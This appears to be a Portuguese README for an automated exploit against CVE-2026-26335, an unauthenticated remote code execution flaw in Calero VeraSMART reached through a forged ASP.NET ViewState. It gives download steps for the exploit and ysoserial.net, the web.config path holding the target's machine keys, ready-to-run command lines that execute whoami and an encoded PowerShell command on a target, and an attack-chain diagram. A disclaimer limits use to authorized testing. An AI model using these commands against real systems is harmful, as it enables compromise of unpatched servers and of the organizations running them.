
Exploit automatizado para CVE-2026-26335, uma RCE crítica não autenticada no Calero VeraSMART via ViewState ASP.NET forjado usando chaves de máquina estáticas. Inclui descoberta de endpoint, geração de payload e execução de comandos.
Mohammed Idrees Banyamer Pesquisador de Segurança
CVE‑2026‑26335 é uma vulnerabilidade crítica de execução remota de código não autenticada no Calero VeraSMART (anterior à versão 2022 R1).
A aplicação utiliza chaves de máquina ASP.NET estáticas e codificadas compartilhadas entre instalações.
Um atacante com essas chaves pode forjar um ViewState ASP.NET malicioso e acionar desserialização no servidor → RCE.
Este exploit automatiza:
__VIEWSTATEGENERATORCWE‑321 — Chaves criptográficas codificadas
As implantações do VeraSMART reutilizam a mesma machineKey ASP.NET:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
Qualquer atacante com as chaves de uma instalação pode atacar todas as outras.
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
As chaves não são públicas. Obtenha-as do alvo:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
Ou via leitura de arquivo complementar:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — Crítico AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Corrigido no VeraSMART 2022 R1:
Soluções alternativas:
Apenas para fins educacionais e testes autorizados. Use somente em sistemas que você possui ou possui permissão para avaliar.
Mohammed Idrees Banyamer Pesquisador de Segurança
O diagrama a seguir ilustra a cadeia de exploração da CVE‑2026‑26335 no Calero VeraSMART, onde chaves de máquina ASP.NET estáticas permitem forjar um ViewState malicioso que leva à execução remota de código.
flowchart LR
A[Atacante] --> B[Obter machineKey do VeraSMART]
B --> C[Descobrir endpoint ViewState]
C --> D[Extrair __VIEWSTATEGENERATOR]
D --> E[Gerar ViewState malicioso via ysoserial]
E --> F[Assinar payload com machineKey]
F --> G[Enviar requisição POST forjada]
G --> H[Desserialização do ViewState ASP.NET]
H --> I[Gadget TypeConfuseDelegate]
I --> J[Execução Remota de Código no IIS]